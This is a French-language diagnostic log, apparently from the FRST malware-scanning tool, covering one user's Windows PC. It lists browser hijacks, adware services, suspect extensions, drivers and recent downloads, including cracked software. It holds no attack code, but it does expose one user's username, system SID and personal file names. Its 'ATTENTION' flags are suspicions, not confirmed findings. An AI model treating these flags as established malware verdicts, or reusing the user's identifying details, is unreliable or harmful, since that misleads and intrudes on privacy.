Task: C:\Windows\Tasks\CCleanerCrashReporting.job => C:\Program Files\CCleaner\CCleanerBugReport.exe
Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job =>

==================== Internet (Avec liste blanche) ====================

(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)

Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{93b89af9-f2e8-4eff-ac3c-3adfa648e84d}: [DhcpNameServer] 192.168.1.1

Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Default [2023-03-25]
Edge HomePage: Default -> hxxp://www.google.fr/
Edge StartupUrls: Default -> "hxxp://www.google.fr/"
Edge Extension: (Discord Token Login) - C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ealjoeebhfijfimofmecjcjcigmadcai [2022-02-24]
Edge Extension: (T-Сashback — кэшбэк-сервис) - C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\odbmjgikedenicicookngdckhkjbebpd [2022-02-08]
Edge Profile: C:\Users\Hdupo\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2023-03-19]
Edge HKLM-x32\...\Edge\Extension: [odbmjgikedenicicookngdckhkjbebpd]

FireFox:
========
FF DefaultProfile: 9rqc0y5g.default
FF ProfilePath: C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\9rqc0y5g.default [2023-03-31]
FF Homepage: Mozilla\Firefox\Profiles\9rqc0y5g.default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10118__220224__yaff
FF NewTab: Mozilla\Firefox\Profiles\9rqc0y5g.default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10118__220224__yaff
FF Extension: (Mail.ru NewTab) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\9rqc0y5g.default\Extensions\{c4c9b8f3-3c9b-41c2-827e-569e556fcb8a}.xpi [2022-02-08]
FF SearchPlugin: C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\9rqc0y5g.default\searchplugins\cdnsearch.xml [2022-02-08]
FF ProfilePath: C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117 [2023-03-31]
FF Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117\Extensions\jid1-NIfFY2CA8fy1tg@jetpack.xpi [2023-03-06]
FF Extension: (Galaxy Space Theme) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117\Extensions\{5eae7880-dab2-4337-bc53-e4b58db7aec4}.xpi [2023-02-02]
FF Extension: (Adblock Plus - bloqueur de publicités gratuit) - C:\Users\Hdupo\AppData\Roaming\Mozilla\Firefox\Profiles\n1dtqyko.default-release-1675367441117\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2023-03-23]
FF Plugin: @java.com/DTPlugin,version=11.361.2 -> C:\Program Files\Java\jre1.8.0_361\bin\dtplugin\npDeployJava1.dll [2023-01-09] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.361.2 -> C:\Program Files\Java\jre1.8.0_361\bin\plugin2\npjp2.dll [2023-01-09] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: Adobe Acrobat -> C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\nppdf32.dll [2023-03-21] (Adobe Inc. -> Adobe Systems Inc.)
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\iaqizjac3yr.js [2022-02-24] <==== ATTENTION (Pointe vers un fichier *.cfg)
FF ExtraCheck: C:\Program Files\mozilla firefox\iaqizjac3yr.cfg [2022-02-24] <==== ATTENTION

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default [2023-03-31]
CHR HomePage: Default -> hxxp://www.accueil-nav.com/
CHR StartupUrls: Default -> "hxxp://www.google.fr/","hxxps://find-it.pro/?utm_source=distr_m"
CHR Extension: (AutoDraw for skribbl.io) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\bpnefockcbbpkbahgkkacjmebfheacjb [2023-01-20]
CHR Extension: (Discord Token Login) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\ealjoeebhfijfimofmecjcjcigmadcai [2022-02-24]
CHR Extension: (YoutubeDownloader) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo [2022-02-08] [UpdateUrl:hxxps://clients81.google.com/service/update2/crx] <==== ATTENTION
CHR Extension: (Google Docs hors connexion) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2022-10-08]
CHR Extension: (AdBlock — le meilleur bloqueur de pubs) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2023-03-31]
CHR Extension: (Google Translate) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\jfhgpjbcoignfibliobpclhpfnadhofn [2022-02-08]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-09-03]
CHR Profile: C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Guest Profile [2023-03-31]
CHR HomePage: Guest Profile -> hxxps://find-it.pro/?utm_source=distr_m
CHR StartupUrls: Guest Profile -> "hxxps://find-it.pro/?utm_source=distr_m"
CHR DefaultSearchKeyword: Guest Profile -> cdn
CHR DefaultSuggestURL: Guest Profile -> hxxps://www.google.ru/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&q={searchTerms}
CHR Extension: (YoutubeDownloader) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo [2022-02-08] [UpdateUrl:hxxps://clients38.google.com/service/update2/crx] <==== ATTENTION
CHR Extension: (Find-it.Pro Search) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\meejmcfbiapijdfaadackoblffmidlig [2022-02-08]
CHR Profile: C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\System Profile [2023-03-31]
CHR HomePage: System Profile -> hxxps://find-it.pro/?utm_source=distr_m
CHR StartupUrls: System Profile -> "hxxps://find-it.pro/?utm_source=distr_m"
CHR DefaultSearchKeyword: System Profile -> cdn
CHR DefaultSuggestURL: System Profile -> hxxps://www.google.ru/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&q={searchTerms}
CHR Extension: (YoutubeDownloader) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo [2022-02-08] [UpdateUrl:hxxps://clients42.google.com/service/update2/crx] <==== ATTENTION
CHR Extension: (Find-it.Pro Search) - C:\Users\Hdupo\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\meejmcfbiapijdfaadackoblffmidlig [2022-02-08]

Opera:
=======
OPR Profile: C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable [2023-03-31]
OPR Extension: (Rich Hints Agent) - C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2022-06-10]
OPR Extension: (Opera Crypto Wallet) - C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2022-06-10]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\Hdupo\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2022-06-10]
StartMenuInternet: (HKU\S-1-5-21-274230415-3152524040-1578995417-1001) Opera GXStable - "C:\Users\Hdupo\AppData\Local\Programs\Opera GX\Launcher.exe"
StartMenuInternet: (HKU\S-1-5-21-274230415-3152524040-1578995417-1001) OperaStable - "C:\Users\Hdupo\AppData\Local\Programs\Opera\Launcher.exe"

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2023-02-01] (Adobe Inc. -> Adobe Inc.)
S3 AppleChargerSrv; C:\Windows\System32\AppleChargerSrv.exe [31272 2010-04-06] (Giga-Byte Technology -> )
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-06-22] (BattlEye Innovations e.K. -> )
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Fichier non signé]
S3 CCleanerPerformanceOptimizerService; C:\Program Files\CCleaner\CCleanerPerformanceOptimizerService.exe [1072440 2023-03-07] (PIRIFORM SOFTWARE LIMITED -> Piriform Software Ltd)
R2 CorsairMsiPluginService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairMsiPluginService.exe [451800 2021-07-26] (Corsair Memory, Inc. -> Corsair Memory, Inc.)
R2 CorsairService; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\Corsair.Service.exe [80608 2021-07-26] (Corsair Memory, Inc. -> Corsair Memory, Inc.)
S2 DCIService; C:\Program Files (x86)\Lavasoft\Web Companion\Service\x64\DCIService.exe [3413424 2022-02-24] (Lavasoft Software Canada Inc. -> )
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-11-01] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EasyAntiCheat_EOS; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.exe [935344 2023-01-08] (EasyAntiCheat Oy -> Epic Games, Inc.)
R2 EasyTuneEngineService; C:\Program Files (x86)\Gigabyte\EasyTuneEngineService\EasyTuneEngineService.exe [147824 2022-06-14] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
R2 Gservice; C:\Program Files (x86)\GIGABYTE\GService\GCloud.exe [19888 2016-12-02] (GIGA-BYTE TECHNOLOGY CO., LTD. -> Microsoft)
R2 LGHUBUpdaterService; C:\Program Files\LGHUB\lghub_updater.exe [11148864 2021-11-03] (Logitech Inc -> Logitech, Inc.)
R2 MyService1; C:\Program Files (x86)\Gigabyte\AppCenter\AdjustService.exe [18944 2021-04-08] () [Fichier non signé]
S2 OCButtonService; C:\Program Files (x86)\Gigabyte\EasyTuneEngineService\OcButtonService.exe [127360 2021-04-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.)
S3 OverwolfUpdater; C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2577752 2022-08-01] (Overwolf Ltd -> Overwolf LTD)
R2 Parsec; C:\Program Files\Parsec\pservice.exe [424584 2022-12-16] (Parsec Cloud, Inc. -> Parsec)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145736 2013-08-15] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [940976 2019-09-04] (Safer-Networking Ltd. -> Safer-Networking Ltd.)
R2 Serviio; C:\Program Files\Serviio\bin\ServiioService.exe [413696 2020-05-03] () [Fichier non signé]
R2 Smart TimeLock; C:\Program Files (x86)\GIGABYTE\Smart TimeLock\TimeMgmtDaemon.exe [102400 2013-02-22] (Gigabyte Technology CO., LTD.) [Fichier non signé]
S3 ss_conn_launcher_service; C:\Windows\System32\Samsung\EasySetup\ss_conn_launcher.exe [182392 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [16360768 2022-08-14] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH) R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [22960 2022-02-24] (Lavasoft Software Canada Inc. -> ) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\NisSrv.exe [3224328 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2302.7-0\MsMpEng.exe [133544 2023-03-29] (Microsoft Windows Publisher -> Microsoft Corporation) S2 CorsairGamingAudioConfig; C:\Windows\System32\CorsairGamingAudioCfgService64.exe [X] S2 CorsairLLAService; "C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CueLLAccessService.exe" [X] S3 CredentialEnrollmentManagerUserSvc; %SystemRoot%\system32\CredentialEnrollmentManager.exe [X] S3 CredentialEnrollmentManagerUserSvc_b23ea; C:\Windows\system32\CredentialEnrollmentManager.exe [X] S3 EpicOnlineServices; "C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe" [X] R2 NVDisplay.ContainerLocalSystem; C:\Windows\System32\DriverStore\FileRepository\nvddig.inf_amd64_49c60aac2cd2e569\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVIDIA\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\Windows\System32\DriverStore\FileRepository\nvddig.inf_amd64_49c60aac2cd2e569\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem S2 RichVideo64; "C:\Program Files\CyberLink\Shared files\RichVideo64.exe" [X] S3 Rockstar Service; "G:\Games\Nouveau dossier\RockstarService.exe" [X] S2 tmHInstall; C:\Program Files\Thrustmaster\T.Flight Hotas\drivers\amd64\tmHInstall.exe [X] ===================== Pilotes (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. 
Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) R3 AmdTools64; C:\Windows\System32\drivers\AmdTools64.sys [63392 2020-06-16] (Microsoft Windows Hardware Compatibility Publisher -> ) R1 AppleCharger; C:\Windows\System32\DRIVERS\AppleCharger.sys [22240 2013-10-28] (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) S3 AppleLowerFilter; C:\Windows\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.) R2 BdDci; C:\Windows\system32\DRIVERS\bddci.sys [367096 2022-02-24] (Bitdefender SRL -> Bitdefender) S3 BthA2dp; C:\Windows\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 BthHFEnum; C:\Windows\System32\drivers\bthhfenum.sys [144896 2019-12-07] (Microsoft Corporation) [Fichier non signé] S3 CorsairGamingAudioService; C:\Windows\System32\drivers\CorsairGamingAudio64.sys [60328 2021-06-30] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R2 CorsairLLAccessC2D033F14715AA7325305EA42FBFC65BF867CC1D; C:\Program Files\Corsair\CORSAIR iCUE 4 Software\CorsairLLAccess64.sys [21752 2021-06-24] (Microsoft Windows Hardware Compatibility Publisher -> Corsair Memory, Inc.) R3 CorsairVBusDriver; C:\Windows\System32\drivers\CorsairVBusDriver.sys [45984 2021-06-24] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R3 CorsairVHidDriver; C:\Windows\System32\drivers\CorsairVHidDriver.sys [21920 2021-06-24] (Microsoft Windows Hardware Compatibility Publisher -> Corsair) R1 CTIIO; C:\Windows\system32\drivers\CtiIo64.sys [32296 2022-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Creative Technology Innovation Co., LTd.) S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus2.sys [160376 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) 
S3 EasyAntiCheat_EOSSys; C:\Program Files (x86)\EasyAntiCheat_EOS\EasyAntiCheat_EOS.sys [13712896 2023-01-19] (EasyAntiCheat Oy -> EasyAntiCheat Oy) S3 gdrv; C:\Windows\gdrv.sys [26192 2021-09-23] (Giga-Byte Technology -> Windows (R) Server 2003 DDK provider) R3 gdrv3; C:\Windows\System32\drivers\gdrv3.sys [45248 2022-10-13] (GIGA-BYTE TECHNOLOGY CO., LTD. -> GIGA-BYTE TECHNOLOGY CO., LTD.) S3 GVCIDrv; C:\Program Files (x86)\GIGABYTE\RGBFusion\GVCIDrv64.sys [18432 2019-12-08] (Microsoft Windows Hardware Compatibility Publisher -> ) R3 HidHide; C:\Windows\System32\drivers\HidHide.sys [61408 2021-04-01] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.) R2 inpoutx64; C:\Windows\System32\Drivers\inpoutx64.sys [15008 2021-08-20] (Red Fox UK Limited -> Highresolution Enterprises [www.highrez.co.uk]) R2 LGHUBTemperatureService; C:\Program Files\LGHUB\logi_core_temp.sys [22864 2021-08-20] (Logitech Inc -> Logitech) S3 logi_audio_surround; C:\Windows\system32\drivers\logi_audio_surround.sys [44488 2021-11-03] (Logitech Inc -> Logitech) R3 logi_joy_bus_enum; C:\Windows\system32\drivers\logi_joy_bus_enum.sys [37200 2021-08-20] (Logitech Inc -> Logitech) R3 logi_joy_vir_hid; C:\Windows\system32\drivers\logi_joy_vir_hid.sys [25928 2021-08-20] (Logitech Inc -> Logitech) R3 logi_joy_xlcore; C:\Windows\system32\drivers\logi_joy_xlcore.sys [66896 2021-08-20] (Logitech Inc -> Logitech) R1 MSIO; C:\Windows\system32\drivers\MsIo64.sys [17424 2023-03-29] (Microsoft Windows Hardware Compatibility Publisher -> MICSYS Technology Co., LTd) R3 NvModuleTracker; C:\Windows\System32\DriverStore\FileRepository\nvmoduletracker.inf_amd64_0c1cc60a4b422185\NvModuleTracker.sys [45656 2022-11-13] (Nvidia Corporation -> NVIDIA Corporation) R3 parsecvusba; C:\Windows\System32\drivers\parsecvusba.sys [256560 2022-07-15] (Microsoft Windows Hardware Compatibility Publisher -> Parsec) S3 pbfilter; C:\Program Files\PeerBlock\pbfilter.sys [22600 2014-01-14] (PeerBlock, 
LLC -> ) R3 SnapCameraVirtualDevice; C:\Windows\System32\drivers\SnapCameraVirtualDevice.sys [2800232 2022-07-26] (Snap Inc. -> Windows (R) Win 7 DDK provider) S0 Spybot3ELAM; C:\Windows\System32\drivers\Spybot3ELAM.sys [19904 2019-06-21] (Microsoft Windows Early Launch Anti-malware Publisher -> Windows (R) Win 7 DDK provider) S3 ssudmdm; C:\Windows\system32\DRIVERS\ssudmdm.sys [167544 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S3 ss_conn_usb_driver2; C:\Windows\System32\Drivers\ss_conn_usb_driver2.sys [43640 2021-10-08] (Samsung Electronics Co., Ltd. -> Samsung Electronics Co., Ltd.) S1 UsbCharger; C:\Windows\System32\DRIVERS\UsbCharger.sys [22240 2013-10-24] (GIGA-BYTE TECHNOLOGY CO., LTD. -> ) R3 VBAudioVACMME; C:\Windows\System32\drivers\vbaudio_cable64_win7.sys [41192 2020-07-31] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\drivers\vbaudio_vmauxvaio64_win10.sys [71920 2021-10-17] (Vincent Burel -> Windows (R) Win 7 DDK provider) R3 VBAudioVMVAIOMME; C:\Windows\System32\drivers\vbaudio_vmvaio64_win10.sys [71712 2021-10-17] (Vincent Burel -> Windows (R) Win 7 DDK provider) R1 ViGEmBus; C:\Windows\System32\drivers\ViGEmBus.sys [165744 2020-12-14] (Microsoft Windows Hardware Compatibility Publisher -> Nefarius Software Solutions e.U.) R3 VOICEMOD_Driver; C:\Windows\system32\drivers\vmdrv.sys [48136 2021-08-12] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [49608 2023-03-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) S3 WDC_SAM; C:\Windows\System32\drivers\wdcsam64.sys [35584 2018-02-26] (WDKTestCert wdclab,130885612892544312 -> Western Digital Technologies, Inc.) 
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [495896 2023-03-29] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [99624 2023-03-29] (Microsoft Windows -> Microsoft Corporation) S3 BEDaisy; \??\C:\Program Files (x86)\Common Files\BattlEye\BEDaisy.sys [X] S3 cpuz150; \??\C:\Windows\temp\cpuz150\cpuz150_x64.sys [X] S3 CrystalCpuInfo; \??\C:\Users\Hdupo\Desktop\CrystalMark09\CpuInfoX86-64.sys [X] S3 CrystalSysInfo; \??\C:\Users\Hdupo\Desktop\CrystalMark09\SysInfoX64.sys [X] S1 EneTechIo; \??\C:\Windows\system32\drivers\ene.sys [X] ==================== NetSvcs (Avec liste blanche) =================== (Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.) ==================== Un mois (créés) (Avec liste blanche) ========= (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 2023-03-31 16:17 - 2023-03-31 16:27 - 000000000 ____D C:\FRST 2023-03-31 16:13 - 2023-03-31 16:13 - 000000000 ___HD C:\$WinREAgent 2023-03-31 16:04 - 2023-03-31 16:04 - 001130604 _____ C:\Windows\Minidump\033123-9375-01.dmp 2023-03-31 15:43 - 2023-03-31 16:04 - 890177741 _____ C:\Windows\MEMORY.DMP 2023-03-31 15:43 - 2023-03-31 15:43 - 001244204 _____ C:\Windows\Minidump\033123-9312-01.dmp 2023-03-31 15:42 - 2023-03-31 15:42 - 000000000 __SHD C:\found.006 2023-03-29 17:42 - 2023-03-29 17:42 - 014387046 _____ C:\Users\Hdupo\Downloads\notice-perceuse-visseuse-sans-fil-makita-ddf485.pdf 2023-03-29 17:29 - 2023-03-29 17:29 - 000003502 _____ C:\Windows\system32\Tasks\EasyTune 1 2023-03-29 17:29 - 2023-03-29 17:29 - 000003486 _____ C:\Windows\system32\Tasks\GraphicsCardEngine 2023-03-29 17:29 - 2023-03-29 17:29 - 000003402 _____ C:\Windows\system32\Tasks\EasyTune 2023-03-29 17:29 - 2023-03-29 17:29 - 000003392 _____ C:\Windows\system32\Tasks\SIV-VGA 2023-03-29 17:29 - 2023-03-29 17:29 - 000003386 _____ 
C:\Windows\system32\Tasks\SIV 2023-03-29 17:29 - 2023-03-29 17:29 - 000002075 _____ C:\Users\Public\Desktop\RGBFusion.lnk 2023-03-29 17:29 - 2023-03-29 17:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\AORUS 2023-03-25 17:20 - 2023-03-25 17:20 - 000689292 _____ C:\Users\Hdupo\Downloads\Melodics 3.0.9574.zip 2023-03-25 17:20 - 2023-03-25 17:20 - 000000187 _____ C:\Users\Hdupo\Downloads\Melodics_3.0.9574_Crack.txt 2023-03-25 17:07 - 2023-03-25 17:07 - 017801406 _____ C:\Users\Hdupo\Downloads\Files_Password_1231.rar 2023-03-24 19:06 - 2023-03-24 19:06 - 001281876 _____ C:\Users\Hdupo\Desktop\poussoir def.gcode 2023-03-24 10:47 - 2023-03-24 10:47 - 000012213 _____ C:\Users\Hdupo\Desktop\Sleppy hollow.odt 2023-03-24 10:45 - 2023-03-24 10:45 - 001086184 _____ () C:\Users\Hdupo\Downloads\PDFpower.exe 2023-03-22 14:13 - 2023-03-22 14:13 - 000087336 _____ C:\Users\Hdupo\Desktop\CE3E3V2_poussoir.3mf 2023-03-22 14:03 - 2023-03-22 14:03 - 000390384 _____ C:\Users\Hdupo\Downloads\mBot_şase.stl 2023-03-22 13:56 - 2023-03-29 16:34 - 000000000 ____D C:\Program Files\Mozilla Firefox 2023-03-19 20:21 - 2023-03-24 14:54 - 000000015 _____ C:\Users\Hdupo\AppData\Roaming\obs-virtualcam.txt 2023-03-19 19:07 - 2023-03-31 14:55 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\obs-studio 2023-03-19 19:06 - 2023-03-19 19:06 - 000001012 _____ C:\Users\Public\Desktop\OBS Studio.lnk 2023-03-19 19:06 - 2023-03-19 19:06 - 000000000 ____D C:\ProgramData\obs-studio-hook 2023-03-19 19:05 - 2023-03-19 19:06 - 000000000 ____D C:\Program Files\obs-studio 2023-03-19 19:05 - 2023-03-19 19:05 - 122400536 _____ (OBS Project) C:\Users\Hdupo\Downloads\OBS-Studio-29.0.2-Full-Installer-x64.exe 2023-03-19 16:47 - 2023-03-19 16:47 - 006883740 _____ C:\Users\Hdupo\Desktop\forge-1.19.2-43.2.0-installer.jar 2023-03-19 16:46 - 2023-03-24 22:07 - 000000000 ____D C:\Users\Hdupo\AppData\Local\D3DSCache 2023-03-19 16:45 - 2023-03-26 13:40 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\.minecraft 
2023-03-19 16:45 - 2023-03-19 16:45 - 023663800 _____ (TLauncher Inc.) C:\Users\Hdupo\Downloads\TLauncher-2.876-Installer-1.0.7-global.exe 2023-03-19 16:45 - 2023-03-19 16:45 - 023663800 _____ (TLauncher Inc.) C:\Users\Hdupo\Downloads\TLauncher-2.876-Installer-1.0.7-global(1).exe 2023-03-19 16:40 - 2023-03-19 16:40 - 000000000 ____D C:\Program Files (x86)\Windows Kits 2023-03-19 16:40 - 2023-03-19 16:40 - 000000000 ____D C:\Program Files (x86)\Microsoft GameInput 2023-03-19 16:26 - 2023-03-19 16:26 - 000000000 ____D C:\ProgramData\Logishrd 2023-03-19 16:12 - 2023-03-19 16:20 - 000000000 ___HD C:\$SysReset 2023-03-19 16:12 - 2023-03-19 16:12 - 000000000 ____D C:\$Windows.~BT 2023-03-19 16:09 - 2023-03-19 16:09 - 000000000 __SHD C:\found.005 2023-03-19 12:06 - 2023-03-19 12:06 - 000000000 __SHD C:\found.003 2023-03-19 11:34 - 2023-03-19 11:34 - 000000000 __SHD C:\found.001 2023-03-18 16:55 - 2023-03-18 17:59 - 000248832 _____ C:\Windows\system32\UserMgrLog.etl 2023-03-18 16:55 - 2023-03-18 17:59 - 000012288 _____ C:\Windows\system32\umstartup.etl 2023-03-18 16:55 - 2023-03-18 16:55 - 000279552 _____ C:\Windows\system32\UserMgrLogBackup.etl 2023-03-18 16:55 - 2023-03-18 16:55 - 000015360 _____ C:\Windows\system32\umstartup000.etl 2023-03-18 13:51 - 2023-03-19 16:14 - 000000000 __SHD C:\found.004 2023-03-17 22:34 - 2023-03-31 15:43 - 000000000 ____D C:\Windows\system32\%LOCALAPPDATA% 2023-03-17 22:33 - 2023-03-18 17:01 - 000635256 _____ C:\Windows\ntbtlog.txt 2023-03-15 20:13 - 2023-03-15 20:20 - 018067275 _____ C:\Users\Hdupo\Documents\DIAPÖ ORAL.odp 2023-03-15 20:10 - 2023-03-15 20:10 - 000015432 _____ C:\Users\Hdupo\Desktop\feuille.odt 2023-03-01 22:19 - 2023-03-22 20:29 - 000000000 ____D C:\Users\Hdupo\AppData\Local\Roblox ==================== Un mois (modifiés) ================== (Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.) 
2023-03-31 16:28 - 2022-11-16 14:33 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\discord 2023-03-31 16:27 - 2022-11-06 16:48 - 000000000 ____D C:\Users\Hdupo\Desktop\jules 2023-03-31 16:26 - 2023-02-11 22:56 - 000001207 _____ C:\Users\Hdupo\Desktop\Google Chrome.lnk 2023-03-31 16:26 - 2021-08-20 15:01 - 000000000 ____D C:\Users\Hdupo\AppData\Local\LGHUB 2023-03-31 16:23 - 2022-02-08 19:59 - 000000000 ____D C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38 2023-03-31 16:23 - 2021-09-03 17:38 - 000000000 ____D C:\Program Files\CCleaner 2023-03-31 16:23 - 2021-09-03 10:09 - 000000000 ____D C:\Program Files (x86)\Google 2023-03-31 16:22 - 2022-11-26 15:11 - 000000000 ____D C:\ProgramData\NVIDIA 2023-03-31 16:22 - 2022-11-16 14:13 - 000000000 ____D C:\Users\Hdupo\AppData\Local\Discord 2023-03-31 16:22 - 2021-08-20 15:00 - 000000000 ____D C:\Users\Hdupo\AppData\LocalLow\Mozilla 2023-03-31 16:21 - 2022-09-03 16:59 - 000000000 ____D C:\Program Files\TeamViewer 2023-03-31 16:21 - 2022-02-08 19:58 - 000000008 __RSH C:\ProgramData\ntuser.pol 2023-03-31 16:21 - 2021-08-20 15:01 - 000000000 ____D C:\Users\Hdupo\AppData\Roaming\LGHUB 2023-03-31 16:21 - 2021-08-20 14:22 - 000008192 ___SH C:\DumpStack.log.tmp 2023-03-31 16:21 - 2021-08-20 14:22 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2023-03-31 16:21 - 2019-12-07 11:14 - 000000000 ____D 